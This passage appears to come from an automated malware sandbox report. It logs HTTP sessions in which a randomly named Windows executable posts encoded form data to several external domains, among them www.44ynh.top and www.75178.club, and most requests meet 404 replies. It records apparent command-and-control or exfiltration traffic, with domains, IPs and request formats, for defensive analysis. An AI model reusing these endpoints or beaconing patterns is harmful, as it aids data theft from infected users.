Jan 10, 2025 21:47:12.719244957 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 20:47:12 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66df0ead-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50015	38.181.21.178	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:14.377439022 CET	747	OUT	POST /l9wb/ HTTP/1.1 Host: www.44ynh.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 223 Origin: http://www.44ynh.top Referer: http://www.44ynh.top/l9wb/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 77 78 46 54 32 63 51 4e 70 31 33 52 77 59 62 70 6a 76 6c 70 61 64 4a 4d 6b 69 63 75 78 66 64 66 77 71 45 4b 78 54 79 36 45 43 31 62 32 2f 6b 74 70 35 72 59 2b 48 36 4a 4e 61 34 77 6e 39 57 5a 53 73 62 46 31 51 4a 2b 73 33 59 55 71 70 4d 35 56 58 2f 74 4c 4a 72 53 48 56 59 56 31 2f 30 38 70 31 4e 6f 76 6b 64 6b 35 56 30 47 76 37 66 73 32 42 55 4f 46 54 73 6f 34 71 58 6a 45 71 4d 43 6c 2f 74 71 72 6c 50 4a 6a 51 31 47 50 41 58 38 78 39 34 6e 65 67 32 4e 35 34 6d 66 36 76 7a 69 51 63 6d 55 52 4c 68 73 31 71 62 7a 6f 3d Data Ascii: blO4h0=QIA1AtWFQ3Bg4//iWZqVLzVkRY5HdpZxku51UmSiFUwxFT2cQNp13RwYbpjvlpadJMkicuxfdfwqEKxTy6EC1b2/ktp5rY+H6JNa4wn9WZSsbF1QJ+s3YUqpM5VX/tLJrSHVYV1/08p1Novkdk5V0Gv7fs2BUOFTso4qXjEqMCl/tqrlPJjQ1GPAX8x94neg2N54mf6vziQcmURLhs1qbzo=
Jan 10, 2025 21:47:15.269620895 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 20:47:15 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66df0ead-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50016	38.181.21.178	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:16.927373886 CET	10829	OUT	POST /l9wb/ HTTP/1.1 Host: www.44ynh.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 10303 Origin: http://www.44ynh.top Referer: http://www.44ynh.top/l9wb/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 6f 78 46 68 4f 63 53 75 78 31 32 52 77 59 54 4a 6a 75 6c 70 61 4d 4a 4d 4d 75 63 75 74 50 64 64 49 71 57 5a 35 54 30 49 73 43 2b 62 32 2f 6d 74 70 30 6d 34 2b 57 36 4a 64 57 34 77 33 39 57 5a 53 73 62 45 6c 51 64 62 4d 33 65 55 71 75 61 70 56 54 37 74 4b 75 72 54 76 6a 59 56 78 76 30 73 4a 31 4f 49 2f 6b 52 33 52 56 37 47 76 35 4d 63 32 6a 55 4f 42 63 73 6f 6b 78 58 67 59 4d 4d 46 46 2f 76 66 32 75 64 59 44 4c 6f 6e 33 4d 45 65 45 66 35 48 4f 6b 32 61 4a 55 6d 4e 57 6c 73 6a 67 72 75 57 77 44 37 2f 38 72 4d 55 72 55 2b 4f 71 59 79 41 76 2f 61 74 44 58 48 6e 43 79 4b 43 36 57 2b 4f 54 75 37 59 6b 6c 49 78 6e 6f 2f 6f 71 4f 6f 75 41 50 2b 59 47 6e 55 57 75 47 7a 4f 46 67 4c 71 38 32 77 6e 43 4a 73 63 44 63 75 42 48 31 76 4e 4f 74 63 6f 2f 6d 2b 68 63 45 58 33 6d 66 33 33 69 56 46 32 44 5a 31 65 4b 54 67 46 67 2b 6d 30 4e 72 34 66 79 63 70 54 37 43 6b 4d 44 [TRUNCATED] Data Ascii: blO4h0=QIA1AtWFQ3Bg4//iWZqVLzVkRY5HdpZxku51UmSiFUoxFhOcSux12RwYTJjulpaMJMMucutPddIqWZ5T0IsC+b2/mtp0m4+W6JdW4w39WZSsbElQdbM3eUquapVT7tKurTvjYVxv0sJ1OI/kR3RV7Gv5Mc2jUOBcsokxXgYMMFF/vf2udYDLon3MEeEf5HOk2aJUmNWlsjgruWwD7/8rMUrU+OqYyAv/atDXHnCyKC6W+OTu7YklIxno/oqOouAP+YGnUWuGzOFgLq82wnCJscDcuBH1vNOtco/m+hcEX3mf33iVF2DZ1eKTgFg+m0Nr4fycpT7CkMD6G0kOqKq8LUmy00Vz1aRfUWxqknyyTsI2wMutfZq4iwX8T1v9wMl6VxcGlLoaHbjL7SO5GnEgtyrbGUBqGAmDl7S/OkjRd4tT8oJG8uyS2l6jhdNfk9aplPXJTYQOGBW7mkeYUbkPiMM978wQLcWUMed6d6jdeBEg9ItV0H1Oaoq8791MtO2fz6t0Y2ZQkXOjD6ub3CNALur0/RbJvbsn+b3bLHqPDJlmX9o+ipOo8EeT8qRXWaBwx8haI/KpUJvfg3yoMXjpwO1RvhUXMK+FLfDClHMpyEqtBXLQVOQkDKBdWK1MZsTSFGGY3/6+oJUgo44OIbkhfydYQRgAaHeUR/wSthULhz7YabsWu3jfyUt1ayw5DWaxvtK1X7as8eZauks5HEvGcizX2pwdqGrJOve+DXjQwIM3iTiDsnlFzUfoD5BYyYdX+//QBJxep1u7kNkyBXRJ8ex1X8ZE9gka6XyPdGOjA1CisVaZ9/h7vVYGZnedWM0vG9XTAN13RfYXk/J/pB/7mKgpUvHq2H9gliOuwdA0D69Rz5I5Ka23gktGbKh2XrdNcwuM/xnbTmWbXxjcRxzEXjFwVvGX3mggmppSh3liAuew4CLqiF+JhPnI4R2h5u7MVkX3WmPoUdzWN6lstVKeCnENtE7sP80pJXVnOR67E9WCG [TRUNCATED]
Jan 10, 2025 21:47:17.954737902 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 20:47:17 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66df0ead-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50017	38.181.21.178	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:19.469851971 CET	470	OUT	GET /l9wb/?Q4DT=n4tTOrYxhN7&blO4h0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0= HTTP/1.1 Host: www.44ynh.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Jan 10, 2025 21:47:20.370652914 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 20:47:20 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66df0ead-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50018	23.167.152.41	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:34.287465096 CET	730	OUT	POST /q34f/ HTTP/1.1 Host: www.75178.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 203 Origin: http://www.75178.club Referer: http://www.75178.club/q34f/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 71 55 75 59 6d 50 51 52 54 6a 57 62 62 45 73 59 2f 56 61 55 6d 62 72 71 78 32 49 43 47 67 30 47 56 49 4e 45 50 75 32 4e 64 5a 66 46 7a 4d 77 6f 68 46 32 6d 6a 65 2b 79 4b 4a 72 78 33 68 68 45 70 50 6a 36 5a 4b 67 39 70 55 34 6f 54 6f 64 44 30 6c 47 63 4a 73 4a 32 36 65 59 41 44 39 4e 74 58 31 6f 6e 47 48 32 62 41 2f 38 59 5a 55 6e 45 49 59 47 74 73 45 48 47 41 45 6c 47 6b 64 69 74 76 66 4b 30 52 46 42 56 64 30 70 4b 45 55 48 7a 31 34 50 76 61 5a 70 76 38 52 6c 63 6e 48 64 46 6b 35 4f 58 7a 5a 36 72 4e 55 36 70 76 30 46 6d 34 50 6b 66 6d 77 3d 3d Data Ascii: blO4h0=QWEVwGy/lyYxqUuYmPQRTjWbbEsY/VaUmbrqx2ICGg0GVINEPu2NdZfFzMwohF2mje+yKJrx3hhEpPj6ZKg9pU4oTodD0lGcJsJ26eYAD9NtX1onGH2bA/8YZUnEIYGtsEHGAElGkditvfK0RFBVd0pKEUHz14PvaZpv8RlcnHdFk5OXzZ6rNU6pv0Fm4Pkfmw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50019	23.167.152.41	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:36.833579063 CET	750	OUT	POST /q34f/ HTTP/1.1 Host: www.75178.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 223 Origin: http://www.75178.club Referer: http://www.75178.club/q34f/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 55 59 47 56 73 4a 45 49 73 65 4e 51 35 66 46 34 73 77 68 38 56 32 54 6a 65 79 4d 4b 49 58 78 33 68 31 45 70 4f 54 36 5a 37 67 38 6f 45 34 71 47 34 64 42 72 31 47 63 4a 73 4a 32 36 59 31 6c 44 39 46 74 57 46 34 6e 4a 46 4f 45 4d 66 38 58 59 55 6e 45 44 34 47 70 73 45 48 42 41 46 4a 34 6b 66 61 74 76 66 61 30 52 52 56 61 58 30 6f 50 4f 30 47 54 32 4b 36 4c 57 37 6f 63 32 41 78 7a 75 45 6c 79 6c 2f 44 4e 69 6f 62 38 66 55 65 61 79 7a 4d 53 31 4d 5a 57 39 30 69 67 53 68 6b 79 64 49 2f 47 49 50 69 58 71 4e 42 4e 37 53 6f 3d Data Ascii: blO4h0=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBUYGVsJEIseNQ5fF4swh8V2TjeyMKIXx3h1EpOT6Z7g8oE4qG4dBr1GcJsJ26Y1lD9FtWF4nJFOEMf8XYUnED4GpsEHBAFJ4kfatvfa0RRVaX0oPO0GT2K6LW7oc2AxzuElyl/DNiob8fUeayzMS1MZW90igShkydI/GIPiXqNBN7So=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50020	23.167.152.41	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:39.503130913 CET	10832	OUT	POST /q34f/ HTTP/1.1 Host: www.75178.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 10303 Origin: http://www.75178.club Referer: http://www.75178.club/q34f/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 56 4d 47 56 2f 52 45 4f 4e 65 4e 52 35 66 46 78 4d 77 6b 38 56 32 4b 6a 65 37 4c 4b 49 61 4d 33 69 4e 45 70 73 62 36 49 2f 30 38 68 45 34 71 45 34 64 41 30 6c 47 7a 4a 73 5a 79 36 59 46 6c 44 39 46 74 57 41 30 6e 4f 58 32 45 4f 66 38 59 5a 55 6e 49 49 59 47 4e 73 45 76 4f 41 46 39 6f 6b 76 36 74 71 4c 47 30 54 6b 42 61 62 30 6f 42 4a 30 47 78 32 4b 6d 55 57 36 46 6e 32 41 46 5a 75 44 46 79 6e 2b 6e 56 33 34 54 2f 4e 6b 4b 4c 75 7a 64 31 34 4e 78 58 79 6d 2b 68 63 44 59 4d 42 4c 7a 57 4c 50 75 65 36 39 68 7a 6f 33 7a 76 2b 74 6d 50 62 4f 46 4e 7a 50 4e 41 4e 57 33 2b 68 4a 30 63 32 63 61 6f 55 50 6a 53 2f 38 78 31 52 4f 63 78 61 6f 4e 68 4a 38 62 4b 6c 7a 78 69 45 48 43 57 31 70 46 4c 45 66 44 4f 4b 65 61 30 6a 52 5a 51 61 78 36 4a 4a 74 69 47 45 44 59 52 59 61 68 39 51 71 4c 41 56 30 30 53 47 53 74 78 67 41 62 7a 64 2b 6f 36 2b 42 71 46 4f 72 30 2b 6c 55 52 [TRUNCATED] Data Ascii: blO4h0=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBVMGV/REONeNR5fFxMwk8V2Kje7LKIaM3iNEpsb6I/08hE4qE4dA0lGzJsZy6YFlD9FtWA0nOX2EOf8YZUnIIYGNsEvOAF9okv6tqLG0TkBab0oBJ0Gx2KmUW6Fn2AFZuDFyn+nV34T/NkKLuzd14NxXym+hcDYMBLzWLPue69hzo3zv+tmPbOFNzPNANW3+hJ0c2caoUPjS/8x1ROcxaoNhJ8bKlzxiEHCW1pFLEfDOKea0jRZQax6JJtiGEDYRYah9QqLAV00SGStxgAbzd+o6+BqFOr0+lURQO85+1UdmSbEDrD7ZFAggxD7riH8Gb+uHWyrsi3WfpXxQkoTDel/RpteSaX3SL5O6n1ySSPP+dXxfxTyDmZ2RUH4BXuLrnzg7VO1TC7ReqO2pu11HvKegxP+MuRdAL1xDOhgUGObEVJPCDdyk+yp5j+tBH5kFwgbywhIho/4T8znuDcoPhUyUeswtcI1zyNXSLRUv806XAKp99QoT2mZetL+WiMhY/k+C5n3KzXaxeKM69db6dFZr0wXLfaXtVUJj/qMlB1rqlAgQ4T3epTj2pl7LyOtdCZaIve+85moqFMjjOdliVz/6I+uEpb0XVil250C36NHW12PJtIJYlycxx1iEmKlNFrU0uGYACMBpdcThH2L2mSm87Mg7n8k0Ar7Y1/uZJ5yqz5HxQ3aqN64euj5zfdhmHWyogzHw1+Ku4rFSaqfN+1dJzvZyN+lMrMZdgDFltP4vtq5IM+YW4IpeGbPluUIQXBEEGfvpYHD+Yi2nfeRM45FdYEI3jF3URN1o4Cg6mjfyYthuEdZdeempyQ7ixYKKX9IopRF7k0LLTvb7WRaeQW6CdewlHd0PBpCYCqvCdbueneLsdZpVPVATcy3xei0OtA5AzgBaLGQQYwAqFNwdbCjcILawSjg3MNxVZgb2i8c48b+JmG+I8rQACCTyfudIbUbJ2 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50021	23.167.152.41	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:42.060421944 CET	471	OUT	GET /q34f/?Q4DT=n4tTOrYxhN7&blO4h0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58= HTTP/1.1 Host: www.75178.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50022	103.75.185.22	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:48.399238110 CET	757	OUT	POST /syud/ HTTP/1.1 Host: www.taxitayninh365.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 203 Origin: http://www.taxitayninh365.site Referer: http://www.taxitayninh365.site/syud/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 48 4e 51 36 59 78 4f 30 6e 46 67 36 6a 38 79 2b 63 69 6f 73 35 61 71 54 4f 2f 6c 5a 46 57 43 52 34 78 6a 30 55 77 35 51 73 4d 4a 4d 76 45 34 35 70 44 31 58 59 79 7a 79 30 64 5a 73 52 43 4f 76 5a 57 6a 61 4f 6b 46 32 4a 58 66 71 76 41 47 32 48 77 4b 75 6b 69 52 47 50 56 6b 4a 59 5a 41 58 66 51 52 4a 66 46 70 31 38 4b 45 7a 44 48 6e 46 52 42 54 63 5a 42 48 6b 65 56 32 2b 71 39 70 79 51 6b 45 47 37 35 67 52 78 61 72 38 64 79 6e 39 7a 77 61 4a 56 45 6c 52 66 2b 54 69 62 7a 68 7a 5a 63 2b 48 73 53 63 68 71 52 77 6e 76 4e 44 41 41 6c 79 4b 31 41 3d 3d Data Ascii: blO4h0=tyMI7ugAvLpMHNQ6YxO0nFg6j8y+cios5aqTO/lZFWCR4xj0Uw5QsMJMvE45pD1XYyzy0dZsRCOvZWjaOkF2JXfqvAG2HwKukiRGPVkJYZAXfQRJfFp18KEzDHnFRBTcZBHkeV2+q9pyQkEG75gRxar8dyn9zwaJVElRf+TibzhzZc+HsSchqRwnvNDAAlyK1A==
Jan 10, 2025 21:47:49.357692957 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Fri, 10 Jan 2025 20:47:49 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Jan 10, 2025 21:47:49.357743025 CET	240	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50023	103.75.185.22	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:51.059854031 CET	777	OUT	POST /syud/ HTTP/1.1 Host: www.taxitayninh365.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 223 Origin: http://www.taxitayninh365.site Referer: http://www.taxitayninh365.site/syud/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 64 73 67 36 65 53 57 30 68 6c 67 39 39 4d 79 2b 56 43 6f 33 35 61 75 54 4f 37 39 4a 47 6b 57 52 37 51 54 30 54 78 35 51 72 4d 4a 4d 33 55 34 38 6e 6a 30 5a 59 79 75 59 30 63 31 73 52 47 6d 76 5a 55 72 61 4f 33 74 33 4b 6e 66 73 36 51 47 4f 61 67 4b 75 6b 69 52 47 50 57 59 6a 59 64 73 58 66 43 46 4a 51 45 70 32 30 71 45 77 4b 6e 6e 46 56 42 54 59 5a 42 48 53 65 51 57 59 71 2f 68 79 51 68 67 47 37 73 41 65 34 61 72 32 51 53 6d 50 2b 56 6e 73 62 30 30 2b 57 4f 2f 78 45 48 6c 6a 56 36 7a 64 39 6a 39 32 34 52 55 55 79 4b 4b 30 4e 6d 50 44 75 47 4e 65 37 36 2f 71 5a 75 63 35 33 7a 62 52 32 4d 2b 78 46 36 45 3d Data Ascii: 